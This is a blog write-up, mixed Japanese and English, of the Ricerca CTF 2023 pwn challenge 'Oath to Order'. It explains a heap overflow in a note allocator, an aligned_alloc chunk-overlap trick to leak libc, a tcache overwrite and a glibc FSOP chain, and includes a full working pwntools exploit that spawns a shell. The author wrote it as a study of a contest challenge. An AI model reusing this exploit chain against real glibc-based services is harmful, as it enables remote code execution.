イントロ Link to this heading

Hey yo, おれの名前はMC NEET、悪そうなやつはだいたい悪い。

さて、久しぶりにCTFに出たのでCTFの記事を書きます。 まぁ解けなかったので、他の人のwriteupを見て写経です。楽しいね。 題材はRicerca CTF 2023Oath to Order。全然関係ないんですが、ぼくは未だにRicercaのスペルを調べないで書けたことがありません。どう頑張ってもRichelcaって書いちゃう。誰か良い覚え方があったら教えてください。

Challenge Analysis Link to this heading

The challenge is a simple note allocator, where

  • We can allocate up to NOTE_LEN(== 10) notes, with each note can have up to NOTE_SIZE(== 300) bytes.
  • We can NOT free allocated notes.
  • We can NOT edit allocated notes.
  • We can specify an index of note to write to. We can write to the same note multiple times, but new allocation is performed everytime.
  • Allocation is done by aligned_alloc(align, size), where we can specify align smaller than NOTE_SIZE.

The most curious thing is that notes are allocated by aligned_alloc. I will briefly introduce this function later in this post.

Vulnerability Link to this heading

Actually, I couldn’t find out the vuln in the program at first glance. So I wrote simple fuzzer and hanged out. When I go back home, the fuzzer crashed when align == 0x100 and size == 0. Okay, this is a vuln:

.c
 1void getstr(char *buf, unsigned size) {
 2  while (--size) {
 3    if (read(STDIN_FILENO, buf, sizeof(char)) != sizeof(char))
 4      exit(1);
 5    else if (*buf == '\n')
 6      break;
 7    buf++;
 8  }
 9
10  *buf = '\0';
11}

When size is zero, we can input data of arbitrary size.

Understanding aligned_alloc to leak libcbase Link to this heading

aligned_alloc is a function to allocate memory at specified alignment. Below is a simple flow to allocate a memory:

  • If align is smaller than MALLOC_ALIGNMENT (==0x10 in many env), just call __libc_malloc(). Note that calling __libc_malloc is a little bit important later.
  • If align is not a power of 2, round up to the next power of 2. (I think this violates POSIX standard, but no worry this is glibc)
  • Calls __int_memalign(), where __int_malloc() is called for the size of size + align, which is the worst case of an alignment mismatche.
  • Find the aligned spot in allocated chunk, and split the chunk into three. The first and the third is freed, then the second is returned.

This is a pretty simplified explanation, but it’s enough to solve this chall.

Heap Puzzle: Leak libcbase by freeing alloced fastbin Link to this heading

First, we allocate a chunk with alignment 0xF0 and size 0:

.py
1  create(0, 0xF0, 0, b"A"*0x10 + p64(0xF0) + p32(0x40))

Note that when we call aligned_alloc with size 0, it allocates minimum size of chunk, which is 0x20. Right after the allocation, heap looks as follows:

.txt
 1# Chunk A (fastbin, last_remainder)
 20x5581b77ee000: 0x0000000000000000      0x00000000000000f1
 30x5581b77ee010: 0x00007f1773219ce0      0x00007f1773219ce0
 40x5581b77ee020: 0x0000000000000000      0x0000000000000000
 50x5581b77ee030: 0x0000000000000000      0x0000000000000000
 60x5581b77ee040: 0x0000000000000000      0x0000000000000000
 70x5581b77ee050: 0x0000000000000000      0x0000000000000000
 80x5581b77ee060: 0x0000000000000000      0x0000000000000000
 90x5581b77ee070: 0x0000000000000000      0x0000000000000000
100x5581b77ee080: 0x0000000000000000      0x0000000000000000
110x5581b77ee090: 0x0000000000000000      0x0000000000000000
120x5581b77ee0a0: 0x0000000000000000      0x0000000000000000
130x5581b77ee0b0: 0x0000000000000000      0x0000000000000000
140x5581b77ee0c0: 0x0000000000000000      0x0000000000000000
150x5581b77ee0d0: 0x0000000000000000      0x0000000000000000
160x5581b77ee0e0: 0x0000000000000000      0x0000000000000000
17# Chunk B (alloced)
180x5581b77ee0f0: 0x00000000000000f0      0x0000000000000020
190x5581b77ee100: 0x4141414141414141      0x4141414141414141
20# Chunk C (fastbin)
210x5581b77ee110: 0x00000000000000f0      0x0000000000000040 # OVERWRITTEN
220x5581b77ee120: 0x00000005581b77ee      0x0000000000000000
230x5581b77ee130: 0x0000000000000000      0x0000000000000000
240x5581b77ee140: 0x0000000000000000      0x0000000000000000
25# Top
260x5581b77ee150: 0x0000000000000000      0x0000000000020eb1

We overwrote C’s header with prev_size = 0xF0 and size = 0x40. Obviously, prev_size is invalid for now, but becomes valid later.

Then, we allocate chunks in Chunk A:

.py
1  create(1, 0, 0, b"B"*0x18 + p32(0xF1))

Heap looks as follows:

.txt
 1# Chunk A1 (alloced)
 20x560d76401000: 0x0000000000000000      0x0000000000000021
 30x560d76401010: 0x4242424242424242      0x4242424242424242
 4# Chunk A2 (unsorted) (system assumes A2+B is a single chunk with size 0xF0)
 50x560d76401020: 0x4242424242424242      0x00000000000000f1 # OVERWRITTEN
 60x560d76401030: 0x00007fcf2c019ce0      0x00007fcf2c019ce0
 70x560d76401040: 0x0000000000000000      0x0000000000000000
 80x560d76401050: 0x0000000000000000      0x0000000000000000
 90x560d76401060: 0x0000000000000000      0x0000000000000000
100x560d76401070: 0x0000000000000000      0x0000000000000000
110x560d76401080: 0x0000000000000000      0x0000000000000000
120x560d76401090: 0x0000000000000000      0x0000000000000000
130x560d764010a0: 0x0000000000000000      0x0000000000000000
140x560d764010b0: 0x0000000000000000      0x0000000000000000
150x560d764010c0: 0x0000000000000000      0x0000000000000000
160x560d764010d0: 0x0000000000000000      0x0000000000000000
170x560d764010e0: 0x0000000000000000      0x0000000000000000
18# Chunk B (alloced)
190x560d764010f0: 0x00000000000000d0      0x0000000000000020
200x560d76401100: 0x4141414141414141      0x4141414141414141
21# Chunk C (fastbin)
220x560d76401110: 0x00000000000000f0      0x0000000000000040
230x560d76401120: 0x0000000560d76401      0x0000000000000000
240x560d76401130: 0x0000000000000000      0x0000000000000000
250x560d76401140: 0x0000000000000000      0x0000000000000000
26# [!] tcache
270x560d76401150: 0x0000000000000000      0x0000000000000291
280x560d76401160: 0x0000000000000000      0x0000000000000000

Chunk A1 and A2 are allocated from Chunk A. We overwrote A2’s header with size = 0xF0 and prev_in_use set. Now, prev_size of Chunk C became valid, which means that A2+B becomes a valid prev chunk of C.

Finally, we allocate a chunk of size 0xD0, which is allocated from A2+B in unsorted bins:

.py
1  create(2, 0, 0xC0, "C" * 0x20)

This is where the magic happens. Heap looks as follows:

.txt
 1# Chunk A1 (alloced)
 20x55942f65c000: 0x0000000000000000      0x0000000000000021
 30x55942f65c010: 0x4242424242424242      0x4242424242424242
 4# Chunk A2A (alloced)
 50x55942f65c020: 0x4242424242424242      0x00000000000000d1
 60x55942f65c030: 0x4343434343434343      0x4343434343434343
 70x55942f65c040: 0x4343434343434343      0x4343434343434343
 80x55942f65c050: 0x0000000000000000      0x0000000000000000
 90x55942f65c060: 0x0000000000000000      0x0000000000000000
100x55942f65c070: 0x0000000000000000      0x0000000000000000
110x55942f65c080: 0x0000000000000000      0x0000000000000000
120x55942f65c090: 0x0000000000000000      0x0000000000000000
130x55942f65c0a0: 0x0000000000000000      0x0000000000000000
140x55942f65c0b0: 0x0000000000000000      0x0000000000000000
150x55942f65c0c0: 0x0000000000000000      0x0000000000000000
160x55942f65c0d0: 0x0000000000000000      0x0000000000000000
170x55942f65c0e0: 0x0000000000000000      0x0000000000000000
18# Chunk A2B(==B) (alloced AND fastbin)
190x55942f65c0f0: 0x00000000000000d0      0x0000000000000021
200x55942f65c100: 0x00007f5eb0e19ce0      0x00007f5eb0e19ce0
21# Chunk C (fastbin)
220x55942f65c110: 0x0000000000000020      0x0000000000000040
230x55942f65c120: 0x000000055942f65c      0x0000000000000000
240x55942f65c130: 0x0000000000000000      0x0000000000000000
250x55942f65c140: 0x0000000000000000      0x0000000000000000
26# [!] tcache
270x55942f65c150: 0x0000000000000000      0x0000000000000291
280x55942f65c160: 0x0000000000000000      0x0000000000000000

Chunk is allocated from unsorted bins and it mistakenly assumes that the size is 0xF0, which We overwrote with. Therefore, Chunk B is freed and connected to fastbin, though it is still in use for notes. We can leak the addr of unsortedbin via fd by reading the note[0]. We got a libcbase.

Overwriting tcache directly for AAW Link to this heading

You may notice that I wrote [!] tcache in the heap layout. tcache is allocated in the middle of chunks in the above layout. This is because tcache is initialized when __libc_malloc is called first time. Remember that we first call aligned_alloc with align = 0xF0 and then with align = 0x0. When we call aligned_alloc with enough align value, it directly calls _int_malloc, which does NOT initialize tcache. This is a good news, because we can easily overwrite tcache in the middle of heap by the overflow.

.py
1  #   counts
2  tcache = p16(1) # count of size=0x20 to 1
3  tcache = tcache.ljust(0x80, b"\x00") # set other counts to 0
4  #   entries
5  tcache += p64(io_stderr)
6  create(3, 0, 0, b"D"*0x58 + p64(0x291) + tcache)

We set counts of size = 0x20 to 1, and entries of the size to _IO_2_1_stderr_. Yes we have to do FSOP.

Heap Corruption

FSOP: abusing wfile vtable Link to this heading

TBH, i’m totally stranger around FSOP of latest glibc. So I searched for some writeups and found good articles:

Plainly speaking, calls to funcs in vtable _IO_wfile_jumps are not supervised. So my approach is:

  • Target is __IO_2_1_stderr_ (hereinafter called stderr).
  • Overwrite stderr._wide_data._wide_vtable to point to somewhere we can write to.
  • Overwrite stderr._vtable from _IO_file_jumps to _IO_wfile_jumps.
  • Call stderr._vtable.__overflow == _IO_wfile_overflow to invoke call to stderr._wide_data._wide_vtable.__doallocate.

__overflow is called when glibc is exiting. glibc calls _IO_cleanup(), where __IO_flush_all_lockp() is called:

.c
 1_IO_flush_all_lockp (int do_lock)
 2{
 3  int result = 0;
 4  FILE *fp;
 5...
 6  for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
 7    {
 8      ...
 9      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
10        || (_IO_vtable_offset (fp) == 0
11          && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
12              > fp->_wide_data->_IO_write_base))
13        )
14      && _IO_OVERFLOW (fp, EOF) == EOF)
15        result = EOF;
16
17    ...
18    }
19...
20}

We can read some restriction of stderr from this code to reach _IO_OVERFLOW:

  • _mode must be larger than 0
  • _wide_data->_IO_write_ptr must be greater than _wide_data->_IO_write_base

Then, _IO_wfile_overflow is called:

.c
 1wint_t
 2_IO_wfile_overflow (FILE *f, wint_t wch)
 3{
 4  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
 5    {
 6      ...
 7      return WEOF;
 8    }
 9  /* If currently reading or no buffer allocated. */
10  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)
11    {
12      /* Allocate a buffer if needed. */
13      if (f->_wide_data->_IO_write_base == 0)
14	{
15	  _IO_wdoallocbuf (f);
16    ...
17	}
18      else
19...

Additional restriction of stderr:

  • _flags & _IO_NO_WRITES(=0x8) must be 0
  • _flags & _IO_CURRENTLY_PUTTING(0x800) must be 0
  • _wide_data->_IO_write_base must be NULL

Finally, _IO_wdoallocbuf is called:

.c
 1void
 2_IO_wdoallocbuf (FILE *fp)
 3{
 4  if (fp->_wide_data->_IO_buf_base)
 5    return;
 6  if (!(fp->_flags & _IO_UNBUFFERED))
 7    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)
 8      return;
 9...
10}

Final restriction:

  • _flags & _IO_UNBUFFERED(0x2) must be 0

To fulfill all the conditions, we can overwrite stderr and following stdout as below:

.py
 1  # Overwrite _IO_2_1_stderr_
 2  #  flags
 3  #  - & _IO_NO_WRITES(0x2): must be 0
 4  #  - & _IO_UNBUFFERED(0x8): must be 0
 5  #  To fulfill this condition, we just use spaces(0x20) before /bin/sh
 6  payload = b" " * 8 + b"/bin/sh\x00" # flags
 7  payload += p64(0x0) * int((0x90/8 - 1))
 8  payload += p64(0) # cvt
 9  payload += p64(io_stdout + 0x20) # wide_data
10  payload += p64(0) * 3
11  payload += p32(1)
12  payload += b"\x00"*0x14
13  payload += p64(io_wfile_jumps)
14
15  ## stdout (== stderr->_wide_data)
16  payload += p64(0) * 4 # becomes wide_vtable
17  payload += p64(0) * 3 # read
18  payload += p64(0) # write_base: must be NULL
19  payload += p64(0x10) # write_ptr
20  payload += p64(0x0) # write_end
21  payload += p64(0x0) # buf_base
22  payload += p64(system) * 4 # becomes wide_vtable->doalloc
23  payload += p64(0) * 2 # state
24  payload += p64(0) * int(0x70/8) # codecvt
25  payload += p64(io_stdout) * 10 # wide_vtable
26
27  create(4, 0, 0, payload)

We use stdout as a buffer for _wide_data (, and entries of fake vtable). In this challenge, IO is performed by read/write calls. So these FILE structure can be tampered. As a sidenote, stderr is the first entry of the chain of FILE structures, so we have to pay attention to stdout and stdin at all :). When we call wide_vtable.__doallocate, which is overwritten with system(), RDI is fp, which is stderr in this case. So we wanna place the string /bin/sh\x00 at the start of stderr. However, here is a _flag and it has some restrictions stated above. And the string doesn’t match the condition. No worry. We can just prefix the /bin/sh\x00 with 8 spaces(0x20), then all conditions are fulfilled. Space is a great character for FSOP!

Full Exploit Link to this heading

https://github.com/smallkirby/pwn-writeups/blob/master/ricerca2023/oath-to-order/exploit.py

.py
  1#!/usr/bin/env python
  2#encoding: utf-8;
  3
  4from pwn import *
  5import sys
  6
  7FILENAME = "chall"
  8LIBCNAME = ""
  9
 10hosts = ("oath-to-order.2023.ricercactf.com","localhost","localhost")
 11ports = (9003,12300,23947)
 12rhp1 = {'host':hosts[0],'port':ports[0]}    #for actual server
 13rhp2 = {'host':hosts[1],'port':ports[1]}    #for localhost 
 14rhp3 = {'host':hosts[2],'port':ports[2]}    #for localhost running on docker
 15context(os='linux',arch='amd64')
 16binf = ELF(FILENAME)
 17libc = ELF(LIBCNAME) if LIBCNAME!="" else None
 18
 19
 20## utilities #########################################
 21
 22def create(ix: int, align: int, size: int, data: str):
 23  global c
 24  print(f"[CREATE] ix:{ix}, align:{align}, size:{size}, datalen:{len(data)}")
 25  print(c.recvuntil("1. Create"))
 26  c.sendlineafter("> ", b"1")
 27  c.sendlineafter("index: ",str(ix))
 28  if "inv" in str(c.recv(4)):
 29    return
 30  c.sendlineafter(": ", str(size))
 31  if "inv" in str(c.recv(4)):
 32    return
 33  c.sendlineafter(": ", str(align))
 34  if "inv" in str(c.recv(4)):
 35    return
 36  if '\n' in str(data):
 37    c.sendlineafter(": ", str(data).split('\n')[0])
 38  elif (len(data) == size - 1) and (size != 0) and (len(data) != 0):
 39    c.sendafter(": ", data)
 40  elif (len(data) >= size and size != 0):
 41    c.sendafter(": ", data[:size-1])
 42  else:
 43    c.sendlineafter(": ", data)
 44
 45def show(ix: int):
 46  global c
 47  print(f"[SHOW] ix:{ix}")
 48  print(c.recvuntil("1. Create"))
 49  c.sendlineafter("> ", b"2")
 50  c.sendlineafter("index: ", str(ix))
 51
 52def quit():
 53  global c
 54  c.sendlineafter("> ", "3")
 55
 56  c.interactive()
 57
 58def wait():
 59  input("WAITING INPUT...")
 60
 61## exploit ###########################################
 62
 63def exploit():
 64  global c
 65
 66  # Alloc 3 chunks
 67  #  - A: freed(fast), size=0xF0, align=0x0
 68  #  - B: alloced    , size=0x20, align=0xF0
 69  #  - C: freed(fast), size=0x40, align=0x110
 70  # Then overwrite C's header with prev_size=0xF0, prev_in_use=false
 71  # Chunk refered by prev_size is allocated later.
 72  create(0, 0xF0, 0, b"A"*0x10 + p64(0xF0) + p32(0x40))
 73  # Alloc 2 chunks, using fastbin(A)
 74  #  - A1: alloced,         size=0x20, align=0x0
 75  #  - A2: freed(unsorted), size=0xD0, align=0x20
 76  # Then overwrite A2's header with 0xF1, which is same with C's prev_size.
 77  # A2 becomes valid prev chunk of C.
 78  #
 79  # Note that this is the first time to call __libc_malloc,
 80  # where tcache is initialized in chunk of size 0x290, because
 81  #  - memalign with too small align: calls `__libc_malloc`
 82  #  - normal memalign: calls `__int_memalign`, where `_int_malloc` is directly called
 83  # Therefore, tcache is initialized right after chunk C.
 84  create(1, 0, 0, b"B"*0x18 + p32(0xF1))
 85  # Alloc 2 chunks, using unsortedbin (A2)
 86  # A2 is the only chunk in unsortedbin and is a last_remainder,
 87  # so it is split into 2 chunks.
 88  #  - A2A: alloced, size=0xD0, align=0x20
 89  #  - A2B: freed(unsorted), size=0xF0
 90  # A2B is identical to B. Its fd and bk is overwritten with unsortedbin's addr.
 91  create(2, 0, 0xC0, "C" * 0x20)
 92
 93  # Leak unsortedbin addr via fd of B(==A2B)
 94  show(0)
 95  unsorted = u64(c.recv(6).ljust(8, b"\x00"))
 96  print("[+] unsorted bin: " + hex(unsorted))
 97  printf = unsorted - 0x1b9570
 98  libcbase = printf - 0x60770
 99  print("[+] libc base: " + hex(libcbase))
100  system = libcbase + 0x50d60
101  io_stderr = libcbase + 0x21a6a0
102  io_stdout = io_stderr + 0xE0
103  io_wfile_jumps = libcbase + 0x2160c0
104  main_arena = libcbase + 0x219c80
105  setcontext = libcbase + 0x53a30
106  print("[+] system: " + hex(system))
107  print("[+] _IO_2_1_stderr_: " + hex(io_stderr))
108  print("[+] main_arena: " + hex(main_arena))
109  print("[+] setcontext: " + hex(setcontext))
110
111  # Overwrite tcache in heap right after C.
112  #   counts
113  tcache = p16(1) # count of size=0x12 to 1
114  tcache = tcache.ljust(0x80, b"\x00") # set other counts to 0
115  #   entries
116  tcache += p64(io_stderr)
117  create(3, 0, 0, b"D"*0x58 + p64(0x291) + tcache)
118
119  # Overwrite _IO_2_1_stderr_
120  #  flags
121  #  - & _IO_NO_WRITES(0x2): must be 0
122  #  - & _IO_UNBUFFERED(0x8): must be 0
123  #  To fulfill this condition, we just use spaces(0x20) before /bin/sh
124  payload = b" " * 8 + b"/bin/sh\x00" # flags
125  payload += p64(0x0) * int((0x90/8 - 1))
126  payload += p64(0) # cvt
127  payload += p64(io_stdout + 0x20) # wide_data
128  payload += p64(0) * 3
129  payload += p32(1)
130  payload += b"\x00"*0x14
131  payload += p64(io_wfile_jumps)
132
133  ## stdout (== stderr->_wide_data)
134  payload += p64(0) * 4 # becomes wide_vtable
135  payload += p64(0) * 3 # read
136  payload += p64(0) # write_base: must be NULL
137  payload += p64(0x10) # write_ptr
138  payload += p64(0x0) # write_end
139  payload += p64(0x0) # buf_base
140  payload += p64(system) * 4 # becomes wide_vtable->doalloc
141  payload += p64(0) * 2 # state
142  payload += p64(0) * int(0x70/8) # codecvt
143  payload += p64(io_stdout) * 10 # wide_vtable
144
145  create(4, 0, 0, payload)
146  quit() # invoke _IO_wfile_overflow in _IO_all_lockp
147
148  c.interactive()
149
150## main ##############################################
151
152if __name__ == "__main__":
153    global c
154    
155    if len(sys.argv)>1:
156      if sys.argv[1][0]=="d":
157        cmd = """
158          set follow-fork-mode parent
159        """
160        c = gdb.debug(FILENAME,cmd)
161      elif sys.argv[1][0]=="r":
162        c = remote(rhp1["host"],rhp1["port"])
163        #s = ssh('<USER>', '<HOST>', password='<PASSOWRD>')
164        #c = s.process(executable='<BIN>')
165      elif sys.argv[1][0]=="v":
166        c = remote(rhp3["host"],rhp3["port"])
167    else:
168        c = remote(rhp2['host'],rhp2['port'])
169    exploit()
170    c.interactive()

アウトロ Link to this heading

いや〜〜、めちゃくちゃパズルで最高ですね。scanf/printfじゃなくてread/writeを使ってたのは、stdoutをぐちゃぐちゃにしてもいいようになのかな。 最近のglibc FSOP周りを全然知らなかったので、とても勉強になりました。これを機にCTF再開しようかなと思えるくらいには楽しかったです。

あと余談なんですが、再来週に人生初飛行機に乗ってイタリアに行かなくちゃいけないので、その前に遺書を書かなくちゃなぁと思っています。

Refs Link to this heading